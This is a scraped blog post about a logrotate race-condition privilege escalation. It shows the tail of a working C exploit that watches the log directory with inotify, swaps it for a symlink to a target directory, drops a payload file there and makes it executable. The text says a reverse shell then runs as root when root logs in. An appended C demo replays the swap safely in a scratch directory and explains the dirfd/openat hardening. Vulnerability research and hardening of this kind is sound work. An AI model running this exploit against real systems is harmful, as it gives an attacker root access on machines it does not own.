#009900;">&#41;</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'2'</span><span style="color: #339933;">;</span> logpath2<span style="color: #009900;">&#91;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strlen.html"><span style="color: #000066;">strlen</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">+</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> <span style="color: #ff0000;">'<span style="color: #006699; font-weight: bold;">\0</span>'</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*creating the INOTIFY instance*/</span> fd <span style="color: #339933;">=</span> inotify_init<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span> DEBUG <span style="color: #339933;">==</span> <span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logfile: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logfile<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logpath: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: 
#339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;logpath2: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>logpath2<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;targetpath: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>targetpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;targetdir: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>targetdir<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/printf.html"><span style="color: #000066;">printf</span></a><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;p: %s<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*checking for error*/</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> fd <span style="color: 
#339933;">&lt;</span> <span style="color: #0000dd;">0</span> <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/perror.html"><span style="color: #000066;">perror</span></a><span style="color: #009900;">&#40;</span> <span style="color: #ff0000;">&quot;inotify_init&quot;</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; wd <span style="color: #339933;">=</span> inotify_add_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span>logpath<span style="color: #339933;">,</span> IN_MOVED_FROM <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">while</span><span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> i<span style="color: #339933;">=</span><span style="color: #0000dd;">0</span><span style="color: #339933;">;</span> length <span style="color: #339933;">=</span> read<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> buffer<span style="color: #339933;">,</span> EVENT_BUF_LEN <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span>i <span style="color: #339933;">&lt;</span> length<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #993333;">struct</span> inotify_event <span style="color: #339933;">*</span>event <span style="color: #339933;">=</span> <span style="color: #009900;">&#40;</span> <span style="color: #993333;">struct</span> inotify_event <span style="color: #339933;">*</span> <span style="color: #009900;">&#41;</span> <span style="color: 
#339933;">&amp;</span>buffer<span style="color: #009900;">&#91;</span> i <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> event<span style="color: #339933;">-&gt;</span>len <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span> event<span style="color: #339933;">-&gt;</span>mask <span style="color: #339933;">&amp;</span> IN_MOVED_FROM <span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.opengroup.org/onlinepubs/009695399/functions/strcmp.html"><span style="color: #000066;">strcmp</span></a><span style="color: #009900;">&#40;</span>event<span style="color: #339933;">-&gt;</span>name<span style="color: #339933;">,</span>p<span style="color: #009900;">&#41;</span> <span style="color: #339933;">==</span> <span style="color: #0000dd;">0</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #808080; font-style: italic;">/* printf( &quot;Something is moved %s.\n&quot;, event-&gt;name ); */</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/rename.html"><span style="color: #000066;">rename</span></a><span style="color: #009900;">&#40;</span>logpath<span style="color: #339933;">,</span>logpath2<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> symlink<span style="color: #009900;">&#40;</span>targetdir<span style="color: #339933;">,</span>logpath<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> sleep<span style="color: #009900;">&#40;</span><span style="color: #0000dd;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> source <span 
style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fopen.html"><span style="color: #000066;">fopen</span></a><span style="color: #009900;">&#40;</span>payloadfile<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;r&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>source <span style="color: #339933;">==</span> NULL<span style="color: #009900;">&#41;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_FAILURE<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; target <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fopen.html"><span style="color: #000066;">fopen</span></a><span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span> <span style="color: #ff0000;">&quot;w&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>target <span style="color: #339933;">==</span> NULL<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_FAILURE<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span 
style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span><span style="color: #009900;">&#40;</span>ch <span style="color: #339933;">=</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fgetc.html"><span style="color: #000066;">fgetc</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">!=</span> EOF<span style="color: #009900;">&#41;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fputc.html"><span style="color: #000066;">fputc</span></a><span style="color: #009900;">&#40;</span>ch<span style="color: #339933;">,</span> target<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; chmod<span style="color: #009900;">&#40;</span>targetpath<span style="color: #339933;">,</span>S_IRUSR <span style="color: #339933;">|</span> S_IXUSR <span style="color: #339933;">|</span> S_IRGRP <span style="color: #339933;">|</span> S_IXGRP <span style="color: #339933;">|</span> S_IROTH <span style="color: #339933;">|</span> S_IXOTH<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>source<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.opengroup.org/onlinepubs/009695399/functions/fclose.html"><span style="color: #000066;">fclose</span></a><span style="color: #009900;">&#40;</span>target<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> inotify_rm_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> wd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> close<span style="color: #009900;">&#40;</span> fd <span style="color: 
#009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_SUCCESS<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> i <span style="color: #339933;">+=</span> EVENT_SIZE <span style="color: #339933;">+</span> event<span style="color: #339933;">-&gt;</span>len<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #808080; font-style: italic;">/*removing from the watch list.*/</span> inotify_rm_watch<span style="color: #009900;">&#40;</span> fd<span style="color: #339933;">,</span> wd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #808080; font-style: italic;">/*closing the INOTIFY instance*/</span> close<span style="color: #009900;">&#40;</span> fd <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <a href="http://www.opengroup.org/onlinepubs/009695399/functions/exit.html"><span style="color: #000066;">exit</span></a><span style="color: #009900;">&#40;</span>EXIT_SUCCESS<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span></pre></div></pre> <p>As soon as root logs in, the reverse shell gets executed with root privileges.</p> <p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/logrotate2.mp4" type="video/mp4" /></video> </p> <h3>Known Issues</h3> <p>I wasn't able to win the race inside a docker container or lvm-volume.</p> <p>&nbsp;</p> <p><b>Update:</b> More details about this problem can be found at <a 
href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Jan 14 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=275&amp;2=comment&amp;3=comment" token="n9usVfEUtf7byg_DtY0U2-fcm665S_LxRZ3k1aaN8cE"></drupal-render-placeholder> </section> Mon, 14 Jan 2019 20:06:52 +0000 Hoti 275 at https://tech.feedyourhead.at
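<p>The directory swap in the listing above works because the symlink it plants is a <em>parent</em> component of the log path, not the final one, so a rotator that creates the new log by its full path follows it even with <code>O_NOFOLLOW</code>. The following C program is an added example, not code from this post or from the exploit; it replays the rename()+symlink() pair against two ways of creating the new file and shows which one is redirected. The scratch layout it builds (<code>logs/</code>, <code>logs2/</code>, <code>target/</code> and <code>app.log</code> under <code>$TMPDIR</code> or <code>/tmp</code>) is constructed for the demonstration and stands in for the real log directory and <code>/etc/bash_completion.d</code>.</p>

```c
/*
 * Added example; not code from the original post or from the exploit above.
 * It replays the directory swap from the listing against two ways a rotator
 * can create the new log file and shows why the swap succeeds. The scratch
 * layout (logs/, logs2/, target/, app.log under TMPDIR or /tmp) is
 * constructed here and stands in for the real log directory and
 * /etc/bash_completion.d.
 */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>

enum { PATHBUF = 4096 };

/* Naive create: resolve the whole path at creation time. O_NOFOLLOW only
 * refuses a symlink as the final component; a symlinked parent directory
 * is followed, which is exactly what the exploit relies on. 0 on success. */
static int create_by_path(const char *dir, const char *name)
{
    char path[PATHBUF];
    snprintf(path, sizeof path, "%s/%s", dir, name);
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Hardened create: the directory was pinned with an fd before rotation
 * started, so a later rename()/symlink() of its path cannot redirect
 * where openat() creates the file. 0 on success. */
static int create_by_dirfd(int dirfd, const char *name)
{
    int fd = openat(dirfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Pin the log directory: no symlink, and it must really be a directory. */
static int pin_log_dir(const char *dir)
{
    struct stat st;
    int dirfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dirfd >= 0 && (fstat(dirfd, &st) != 0 || !S_ISDIR(st.st_mode))) {
        close(dirfd);
        return -1;
    }
    return dirfd;
}

static int exists_in(const char *dir, const char *name)
{
    char path[PATHBUF];
    struct stat st;
    snprintf(path, sizeof path, "%s/%s", dir, name);
    return lstat(path, &st) == 0;
}

/* Replays the race. Returns 1 when the naive create is redirected into
 * target/ while the pinned create lands in the real (renamed) directory,
 * 0 if either did not happen, -1 on setup failure. Cleans up after itself. */
int demo_dir_swap(void)
{
    const char *tmp = getenv("TMPDIR");
    char base[PATHBUF], logs[PATHBUF], logs2[PATHBUF], target[PATHBUF], p[PATHBUF];
    snprintf(base, sizeof base, "%s/lograce.XXXXXX", tmp ? tmp : "/tmp");
    if (!mkdtemp(base)) return -1;
    snprintf(logs,   sizeof logs,   "%s/logs",   base);
    snprintf(logs2,  sizeof logs2,  "%s/logs2",  base);
    snprintf(target, sizeof target, "%s/target", base);
    if (mkdir(logs, 0755) != 0 || mkdir(target, 0755) != 0) return -1;

    /* Defender: pin the directory before touching anything inside it. */
    int dirfd = pin_log_dir(logs);
    if (dirfd < 0) return -1;

    /* Attacker: the rename()+symlink() pair from the listing above. */
    if (rename(logs, logs2) != 0 || symlink(target, logs) != 0) return -1;

    /* The rotator's "create" step, done both ways after the swap. */
    int naive_ok  = create_by_path(logs, "app.log") == 0;
    int pinned_ok = create_by_dirfd(dirfd, "app.log") == 0;
    close(dirfd);

    int result = naive_ok  && exists_in(target, "app.log") &&
                 pinned_ok && exists_in(logs2,  "app.log");

    snprintf(p, sizeof p, "%s/app.log", target); unlink(p);
    snprintf(p, sizeof p, "%s/app.log", logs2);  unlink(p);
    unlink(logs); rmdir(logs2); rmdir(target); rmdir(base);
    return result;
}

int main(void)
{
    int r = demo_dir_swap();
    printf("path-based create redirected, dirfd-based create safe: %s\n",
           r == 1 ? "confirmed" : "not reproduced");
    return r == 1 ? 0 : 1;
}
```

<p>Build it with <code>gcc -Wall -o lograce lograce.c</code> and run it as an unprivileged user; it exits 0 when the path-based create ended up in <code>target/</code> and the pinned create stayed in the renamed real directory. The rotator-side lesson is that <code>O_NOFOLLOW</code> on the log file alone buys nothing here: the directory has to be opened with <code>O_DIRECTORY | O_NOFOLLOW</code> before the rotation starts, its ownership checked with <code>fstat()</code>, and every later open done with <code>openat()</code> relative to that fd.</p>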